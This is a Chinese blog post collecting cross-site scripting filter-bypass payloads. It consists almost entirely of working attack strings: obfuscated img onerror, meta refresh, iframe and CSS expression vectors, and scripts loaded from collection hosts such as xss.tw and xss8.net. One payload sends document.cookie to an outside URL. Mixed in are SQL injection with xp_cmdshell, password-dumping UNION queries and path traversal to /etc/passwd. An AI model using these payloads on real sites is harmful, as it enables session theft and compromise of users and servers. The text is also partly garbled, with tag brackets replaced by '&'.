<html div idd="d">11</div> <html div idd="d">11</div> 两个id相同

"&&img src="" onerror="document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))"& &在网页过滤了&script和单引号的情况下可以使用代码绕过,上面write中内容输出的结果是&script&alert(1)&/script& & 如果想缩短,可以把上面的参数合并,像这样:String.fromCharCode(76,90,83,66);"&&meta http-equiv="Refresh" content="0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))& 遇到过滤&script&无法调用js的时候也可以用类似的代码突破,上面代码是跳转url到javascript:document.write("&script src=xxx&&/script&") 也就是调用js文件xxx 如果想缩短,可以把上面的参数合并,像这样:String.fromCharCode(76,90,83,66);"&&iframe src=javascript:alert(document.cookie); height=0 width=0 /& &&iframe&弹窗&iframe src=javascript:with(document)0[body.appendChild(document.createElement('script')).src="http://url.cn/1.js"]&&/iframe& iframe收信&&img src=x onerror=appendChild(createElement('script')).src='//js地址' /& 
img标签来收信&img/**/src=1/**/onerror="with(document)body.appendChild(createElement('script')).src='脚本地址'" /& & 过滤了 &script&标签 以及空格 的解决办法&img src="5" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")&&/img& &回显是&img src="5" onerror=eval("alert('xss')")&&/img& &&如果你要加载脚本请这样:javascript:document.write(unescape(' &script src="脚本地址"&&/script&')); 修改好后 进行HEX加密再放入eval&注:第一段代码:首先将要执行的 利用Hex 编码 再img 的错误事件 用eval 函数 操控()内的代码!eval 可以计算 并执行 将上面代码解码后便执行了!&第二段加载脚本的:首先是利用 javascript unescape函数 对()内的HEX编码进行解码 然后再通过document.write 在文档对象上面输入()内的内容!&因为()内的内容以及经过unescape的解码 所以输出来后是正常的 如果没有进行解码 那么你输出来的 将会是hex&在这里没有出现 script等危险标签 也没有单引号 所以成功绕过! & &过滤了单引号 以及几个危险标签&script&document.write(String.fromCharCode(在这里写上你的代码));&/script& & 过滤了等号 单引号 双引号 空格的绕过方法&img src=1 onerror=&#106&#x61v&#x61scri&#x70&#116:&#97&#108&#x65rt(&#34\x58S\x53\40\x41t\x74\x61\x63\153e\162&#34)& &该过滤的都过滤了&img src=x onerror=alert(/insight-labs/)&、&p onmouseover=alert(/insight-labs/)&insight-labs、&frameset onload=alert(/insight-labs/)&、&body onload=alert(/insight-labs/)& & 事件函数 来弹窗屏蔽了scaript可以把scaript改成sc%0aript来绕过"h"+"t"+"t"+"p",绕过对http的过滤'"&&script&alert(/1/)&/script&&a="'"&&script src=http://x.co/xiHv&&/script&&a="='&&script&alert(document.cookie)&/script&&script&alert(document.cookie)&/script&&script&alert(vulnerable)&/script&%3Cscript%3Ealert('XSS')%3C/script%3E'"&&script src="//x.co/xiHv"&&/script&&a="'"&&script src=//xss.tw/2045&&/script&&a="'"&&script src=//xss.tw/3058&&/script&&a="&&script&src=//xss.tw/3058&&/script&& &引号& &空格& & &&& & &&无src 无等号 &无引号"&&/span&&script&document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,46,99,111,47,120,105,72,118,62,60,47,115,99,114,105,112,116,62));&/script&&span&eval(Dec('203','2549'));&div style="display:none"&&/div&&div style="display:none" &t="1" &e="style\/&'&&&/div&&/ \&&/&img src=# 
onerror=eval(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,120,115,115,46,116,119,47,51,48,53,56,62,60,47,115,99,114,105,112,116,62,32));/\&gt&&div id="myxsxxcd" style="color:display:none" title="if(!window.myxsssxx){window.myxsssxx=123;alert(document.cookie);}"&&DIV&&A&&/A&&STYLE&&!--a{& img src=&/STYLE&;x:expression(eval(myxsxxcd.title));&style&}--&&/style&&/DIV&&td width="628" background="/img/index2_r7_c2_r1_c5_s1_s1.jpg"&&img src=x onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,116,119,47,51,51,56,49,34))&&&img src=x onerror=eval(String.fromCharCode(document.body.appendChild(createElement("script")).src="http://xss.tw/3381"))&&img src=x onerror=document.body.appendChild(createElement('script')).src="javascript:alert(/1/)"&&&img src=x onerror=document.body.appendChild(createElement('script')).src='http://xss8.net/?
c=QihaL'&&p&&img class="reference" contenteditable="false" data-refid="2" data-type="reference" onerror="eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))" src="http://img.baidu.com/img/baike/editor/reference.gif" unselectable="on" /&&/p&eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))&div class="qm_left" style="position:z-index:2;background:url(//xss.tw/2180) no-repeat 0 0;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='//xss.tw/2180',sizingMethod='scale');width:40height:40"&&span class="qm_ico_print" id="mail_print" title="打印" onclick="window.open('/cgi-bin/readmail?sid=SC_hEOi3h_nqEgJQ&amp');"&&/span&ECMAScript v3 已从标准中删除了 unescape() 函数,并反对使用它因此应该用 decodeURI() 和 decodeURIComponent() 取而代之。通过找到形式为 %xx 和 %uxxxx 的字符序列(x 表示十六进制的数字)用 Unicode 字符 \u00xx 和 \uxxxx 替换这样的字符序列进行解码。解密是unescape('%udcdb%uced3%u8d93%u888a%ud58f%u');加密是escape('%udcdb%uced3%u8d93%u888a%ud58f%ud4c8%udcd9%ud ');&javascript:document.write(unescape('&script src="http://www.xxxx.com/x.js"&&/script&'));document.write(String.fromCharCode(60,12,62)); &==== &document.write(String.fromCharCode(&script src=http://xss.me/1&&/script&));&"&&/span&&script&document.write(http://baidu.com)&/script&&span&[email][url][img]http://xxx.com onmouseover=eval(String.fromCharCode(116,114)); [/img][/url][/email]鼠标单击&a href="http://www.xyydyt.com" style="color:#143d70;" onclick="alert(/a/);this.style.behavior='url(#default#homepage)';this.setHomePage('http://www.xyydyt.com'); 
return(false);"&asdasdsad&/a&&table background=”javascript:alert(/xss/)”&&/table&’/在表格中插入脚本&&过滤用\x3cscript. src=http://www.2cto.com /malicious-code.js\x3e\x3c/script\x3e&&script defer="defer"&var a,b;a="/";b="/x.co/xiHv";window.open(a+b,"","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=500,height=500");&/script&&% string str_a = rrequest.getParameter("a");%&&var a= &%=str_a%&document.write(a);&img src="123"&a.jsp/&script&alert('Vulnerable')&/script&a/a?&script&alert('Vulnerable')&/script&"&&script>alert('xss')</script&';exec%20master..xp_cmdshell%20'dir%20 c:%20&%20c:\inetpub\wwwroot\?.txt'--&&%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cscript%3Ealert(document. domain);%3C/script%3E&%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=../../../../../../../../etc/passwd..\..\..\..\..\..\..\..\windows\system.ini\..\..\..\..\..\..\..\..\windows\system.ini'';!--"&XSS&=&{()}&IMG src="javascript:alert('XSS');"&&IMG src=javascript:alert('XSS')&&IMG src=JaVaScRiPt:alert('XSS')&&IMG src=JaVaScRiPt:alert("XSS")&&IMG src=javascript:alert('XSS')&&IMG src=javascript:alert('XSS')&&IMG src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&&&sRCIpt&alert(/123/)&/ScRpT&&P&&SPAN class=xmsw title=防火外墙保温材料 onmouseout="window.location='http://www.xfydyt.com'"&了解你的产品和行&/SPAN&&/P&&div style="background-image:url(&script&alert(document.cookie)&/script&)"&&div style="background-image:url(javascript:alert(document.cookie))"&&div style="behaviour:url('http://www.how-to-hack.org/exploit.html');"&&div style="width:expression(alert('x123ss'));"&&img src="java&#script:alert(/1231/);"&&img src=javascript:alert(/1231/);&&img src="javascript:alert('XSS')"&&IMG src="jav ascript:alert('XaSS');"&&IMG src="jav ascript:alert('XbSS');"&&IMG src="jav ascript:alert('XcSS');"&"&IMG 
src=java\0script:alert(\"XSS\")&";' & out&IMG src=" javascript:alert('XdSS');"&&SCRIPT&a=/XSfS/alert(a.source)&/SCRIPT&&BODY BACKGROUND="javascript:alert('XeSS')"&&BODY ONLOAD=alert('XgSS')&&IMG DYNSRC="javascript:alert('XhSS')"&&IMG LOWSRC="javascript:alert('XiSS')"&&BGSOUND src="javascript:alert('XjSS');"&&span onclick="javascript:changeFont(2);"&&SPAN class=xmsw title=dd onmouseout=window.location='http://www,xfydyt.com'&test&/span&&span class="xmsw" title="dd" onmouseout=window.location='http://test/test.php?c='+document.cookie&test&/span&&SPAN class=xmsw title=dd onmouseout=javascript:alert(document.cookie)&test&/SPAN&&br size="&{alert('XkSS')}"&&LAYER src="http://xss.ha.ckers.org/a.js"&&/layer&&LINK REL="stylesheet" href="javascript:alert('XlSS');"&&IMG src='vbscript:msgbox("XmSS")'&&IMG src="mocha:[code]"&&IMG src="livescript:[code]"&&META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XoSS');"&&IFR & &AME src=javascript:alert('XSnS')&&/IFRA & &ME&&FRAMESET&&FRAME src=javascript:alert('XpSS')&&/FRAME&&/FRAMESET&&TABLE BACKGROUND="javascript:alert('XSqS')"&&DIV STYLE="background-image: url(javascript:alert('X1SS'))"&&DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');"&&DIV STYLE="width: expression(alert('X2SS'));"&&STYLE&@im\port'\ja\vasc\ript:alert("X3SS")';&/STYLE&&IMG STYLE='xss:expre\ssion(alert("X5SS"))'&&STYLE TYPE="text/javascript"&alert('X4SS');&/STYLE&&STYLE TYPE="text/css"&.XSS{background-image:url("javascript:alert('X6SS')");}&/STYLE&&A CLASS=XSS&&/A&&STYLE type="text/css"&BODY{background:url("javascript:alert('X7SS')")}&/STYLE&&BASE href="javascript:alert('X8SS');//"&getURL("javascript:alert('X9SS')")a="get";b="URL";c="javascript:";d="alert('X10SS');";eval(a+b+c+d);&XML src="javascript:alert('X11SS');"&"& &BODY ONLOAD="a();"&&SCRIPT&function a(){alert('X12SS');}&/SCRIPT&&"&SCRIPT src="http://xss.ha.ckers.org/xss.jpg"&&/SCRIPT&&IMG src="javascript:alert('X13SS')"&!--#exec cmd="/bin/echo '&SCRIPT SRC'"--&&!--#exec 
cmd="/bin/echo '=http://xss.ha.ckers.org/a.js&&/SCRIPT&'"--&&IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"&&SCRIPT a="&" src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&SCRIPT ="&" src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&SCRIPT a="&" '' src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&SCRIPT "a='&'" src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&SCRIPT&document.write("&SCRI");&/SCRIPT&PT src="http://xss.ha.ckers.org/a.js"&&/SCRIPT&&A href=http://www.gohttp://www.google.com/ogle.com/&link&/A&&DIV STYLE="width:expression(alert('anyunix'));"&&IMG SRC='vbscript:msgbox("anyunix")'&&STYLE&width:expression(alert('anyunix'));&/STYLE&(1)普通的XSS JavaScript注入&SCRIPT SRC=http://3w.org/XSS/xss.js&&/SCRIPT&(2)IMG标签XSS使用JavaScript命令&SCRIPT SRC=http://3w.org/XSS/xss.js&&/SCRIPT&(3)IMG标签无分号无引号&IMG SRC=javascript:alert('XSS')&(4)IMG标签大小写不敏感&IMG SRC=JaVaScRiPt:alert('XSS')&(5)HTML编码(必须有分号)&IMG SRC=javascript:alert("XSS")&(6)修正缺陷IMG标签&IMG """&&SCRIPT&alert("XSS")&/SCRIPT&"&(7)formCharCode标签(计算器)&IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&(8)UTF-8的Unicode编码(计算器)&IMG SRC=jav..省略..S')&(9)7位的UTF-8的Unicode编码是没有分号的(计算器)&IMG SRC=jav..省略..S')&(10)十六进制编码也是没有分号(计算器)&IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29&(11)嵌入式标签,将Javascript分开&IMG SRC="jav ascript:alert('XSS');"&(12)嵌入式编码标签,将Javascript分开&IMG SRC="jav ascript:alert('XSS');"&(13)嵌入式换行符&IMG SRC="jav ascript:alert('XSS');"&(14)嵌入式回车&IMG SRC="jav ascript:alert('XSS');"&(15)嵌入式多行注入JavaScript,这是XSS极端的例子&IMG SRC="javascript:alert('XSS')"&(16)解决限制字符(要求同页面)&script&z='document.'&/script&&script&z=z+'write("'&/script&&script&z=z+'&script'&/script&&script&z=z+' src=ht'&/script&&script&z=z+'tp://ww'&/script&&script&z=z+'w.shell'&/script&&script&z=z+'.net/1.'&/script&&script&z=z+'js&&/sc'&/script&&script&z=z+'ript&")'&/script&&script&eval_r(z)&/script&(17)空字符perl -e 'print "&IMG SRC=java\0script:alert(\"XSS\")&";' & out(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用perl -e 'print 
"&SCR\0IPT&alert(\"XSS\")&/SCR\0IPT&";' & out(19)Spaces和meta前的IMG标签&IMG SRC=" javascript:alert('XSS');"&(20)Non-alpha-non-digit XSS&SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"&&/SCRIPT&(21)Non-alpha-non-digit XSS to 2&BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")&(22)Non-alpha-non-digit XSS to 3&SCRIPT/SRC="http://3w.org/XSS/xss.js"&&/SCRIPT&(23)双开括号&&SCRIPT&alert("XSS");//&&/SCRIPT&(24)无结束脚本标记(仅火狐等浏览器)&SCRIPT SRC=http://3w.org/XSS/xss.js?&B&(25)无结束脚本标记2&SCRIPT SRC=//3w.org/XSS/xss.js&(26)半开的HTML/JavaScript XSS&IMG SRC="javascript:alert('XSS')"(27)双开角括号&iframe src=http://3w.org/XSS.html &(28)无单引号 双引号 分号&SCRIPT&a=/XSS/alert(a.source)&/SCRIPT&(29)换码过滤的JavaScript\";alert('XSS');//(30)结束Title标签&/TITLE&&SCRIPT&alert("XSS");&/SCRIPT&(31)Input Image&INPUT SRC="javascript:alert('XSS');"&(32)BODY Image&BODY BACKGROUND="javascript:alert('XSS')"&(33)BODY标签&BODY('XSS')&(34)IMG Dynsrc&IMG DYNSRC="javascript:alert('XSS')"&(35)IMG Lowsrc&IMG LOWSRC="javascript:alert('XSS')"&(36)BGSOUND&BGSOUND SRC="javascript:alert('XSS');"&(37)STYLE sheet&LINK REL="stylesheet" HREF="javascript:alert('XSS');"&(38)远程样式表&LINK REL="stylesheet" HREF="http://3w.org/xss.css"&(39)List-style-image(列表式)&STYLE&li {list-style-image: url("javascript:alert('XSS')");}&/STYLE&&UL&&LI&XSS(40)IMG VBscript&IMG SRC='vbscript:msgbox("XSS")'&&/STYLE&&UL&&LI&XSS(41)META链接url&META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"&(42)Iframe&IFRAME SRC="javascript:alert('XSS');"&&/IFRAME&(43)Frame&FRAMESET&&FRAME SRC="javascript:alert('XSS');"&&/FRAMESET&(44)Table&TABLE BACKGROUND="javascript:alert('XSS')"&(45)TD&TABLE&&TD BACKGROUND="javascript:alert('XSS')"&(46)DIV background-image&DIV STYLE="background-image: url(javascript:alert('XSS'))"&(47)DIV background-image后加上额外字符(1-32&34&39&160&&)&DIV STYLE="background-image: url( javascript:alert('XSS'))"&(48)DIV expression&DIV STYLE="width: expression_r(alert('XSS'));"&(49)STYLE属性分拆表达&IMG 
STYLE="xss:expression_r(alert('XSS'))"&(50)匿名STYLE(组成:开角号和一个字母开头)&XSS STYLE="xss:expression_r(alert('XSS'))"&(51)STYLE background-image&STYLE&.XSS{background-image:url("javascript:alert('XSS')");}&/STYLE&&A CLASS=XSS&&/A&(52)IMG STYLE方式exppression(alert("XSS"))'&(53)STYLE background&STYLE&&STYLE type="text/css"&BODY{background:url("javascript:alert('XSS')")}&/STYLE&(54)BASE&BASE HREF="javascript:alert('XSS');//"&(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS&EMBED SRC="http://3w.org/XSS/xss.swf" &&/EMBED&(56)在flash中使用ActionScrpt可以混进你XSS的代码a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval_r(a+b+c+d);(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上&HTML xmlns:xss&&?import namespace="xss" implementation="http://3w.org/XSS/xss.htc"&&xss:xss&XSS&/xss:xss&&/HTML&(58)如果过滤了你的JS你可以在图片里添加JS代码来利用&SCRIPT SRC=""&&/SCRIPT&(59)IMG嵌入式命令,可执行任意命令&IMG SRC="http://www.XXX.com/a.php?a=b"&(60)IMG嵌入式命令(a.jpg在同服务器)Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser(61)绕符号过滤&SCRIPT a="&" SRC="http://3w.org/xss.js"&&/SCRIPT&(62)&SCRIPT ="&" SRC="http://3w.org/xss.js"&&/SCRIPT&(63)&SCRIPT a="&" " SRC="http://3w.org/xss.js"&&/SCRIPT&(64)&SCRIPT "a='&'" SRC="http://3w.org/xss.js"&&/SCRIPT&(65)&SCRIPT a=`&` SRC="http://3w.org/xss.js"&&/SCRIPT&(66)&SCRIPT a="&'&" SRC="http://3w.org/xss.js"&&/SCRIPT&(67)&SCRIPT&document.write("&SCRI");&/SCRIPT&PT SRC="http://3w.org/xss.js"&&/SCRIPT&(68)URL绕行&A HREF="http://127.0.0.1/"&XSS&/A&(69)URL编码&A HREF="http://3w.org"&XSS&/A&(70)IP十进制&A HREF="http://″&XSS&/A&(71)IP十六进制&A HREF="http://0xc0.0xa8.0×00.0×01″&XSS&/A&(72)IP八进制&A HREF="http://00.0001″&XSS&/A&(73)混合编码&A HREF="htt p://6 6.×7.147/""&XSS&/A&(74)节省[http:]&A HREF="//www.google.com/"&XSS&/A&(75)节省[www]&A HREF="http://google.com/"&XSS&/A&(76)绝对点绝对DNS&A HREF="http://www.google.com./"&XSS&/A&(77)javascript链接&A HREF="javascript:document.location='http://www.google.com/'"&XSS&/A&Code: &INPUT TYPE="IMAGE" SRC="javascript:alert(XSS);"&Code: &BODY BACKGROUND="javascript:alert(XSS)"&Code: &BODY ONLOAD=alert(XSS)&Code: 
&IMG DYNSRC="javascript:alert(XSS)"&Code: &BGSOUND SRC="javascript:alert(XSS);"&Code: &BR SIZE="&{alert(XSS)}"& &(netspace)Code: &LINK REL="stylesheet" HREF="javascript:alert(XSS);"&Code: &LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"&Code: &STYLE&@importhttp://ha.ckers.org/xss.&/STYLE&Code: &META HTTP-EQUIV="Link" Content="&http://ha.ckers.org/xss.css&; REL=stylesheet"&Code: &STYLE&BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}&/STYLE&Code: &XSS STYLE="behavior: url(xss.htc);"&Code: &STYLE&li {list-style-image: url("javascript:alert(XSS)");}&/STYLE&&UL&&LI&XSSCode: &IMG SRC="mocha:[code]"& (netscape only)Code: &IMG SRC="livescript:[code]"& (netscape only)Code: &TABLE BACKGROUND="javascript:alert(XSS)"&Code: &IFRAME SRC="javascript:alert(XSS);"&&/IFRAME&Code: &TABLE&&TD BACKGROUND="javascript:alert(XSS)"&Code: &DIV STYLE="background-image: url(javascript:alert(XSS))"&Code: &BASE HREF="javascript:alert(XSS);//"&&US_ASCII编码(库尔特发现)。使用7位ascii编码代替8位,可以绕过很多过滤。但是必须服务器是以US-ASCII编码交互的。目前仅发现Apache Tomcat是以该方式交互。Code: ?scriptualert(EXSSE)?/scriptu&META协议Code:&META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(XSS);"&Code: &META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"&Code: &META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(XSS);"&&对DIV进行unicode编码Code: &DIV STYLE="background-image: 075 072 06C 028 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.3 053 027 029 029"&&使用expression属性Code: &DIV STYLE="width: expression(alert(XSS));"&&STYLE标签Code:&STYLE&@importjavasc ipt:alert("XSS");&/STYLE&Code: &STYLE TYPE="text/javascript"&alert(XSS);&/STYLE&Code: &STYLE&.XSS{background-image:url("javascript:alert(XSS)");}&/STYLE&&A CLASS=XSS&&/A&Code: &STYLE type="text/css"&BODY{background:url("javascript:alert(XSS)")}&/STYLE&&OBJECT标签Code: &OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"&&/OBJECT&Code: &OBJECT 
classid=clsid:ae24fdae-03c6-11d1-8b76-&&param name=url value=javascript:alert(XSS)&&/OBJECT&&EMBED标签Code: &EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"&&/EMBED&Code: &EMBED SRC="data:image/svg+base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"&&/EMBED&在flash文件中使用如下代码:Code: a="get";b="URL("";c="javascript:";d="alert(XSS);")";eval(a+b+c+d);&XML namespace可以引入行为文件htc但是必须在同一服务器上Code: &HTML xmlns:xss&& &?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"&& &xss:xss&XSS&/xss:xss&&/HTML&Xss.htc: &PUBLIC:COMPONENT TAGNAME="xss"&& &&PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/&&/PUBLIC:COMPONENT&&SCRIPT&& &function main()& &{& & &alert("XSS");& &}&/SCRIPT&&使用CDATA模糊化的XML数据岛Cdoe: &XML ID=I&&X&&C&&![CDATA[&IMG SRC="javas]]&&![CDATA[cript:alert(XSS);"&]]&&/C&&/X&&/xml&&SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&&/SPAN&&XML数据岛Code:&XML ID="xss"&&I&&B&&IMG SRC="javas&!-- --&cript:alert(XSS)
blogTitle:'xss各种绕过收集',
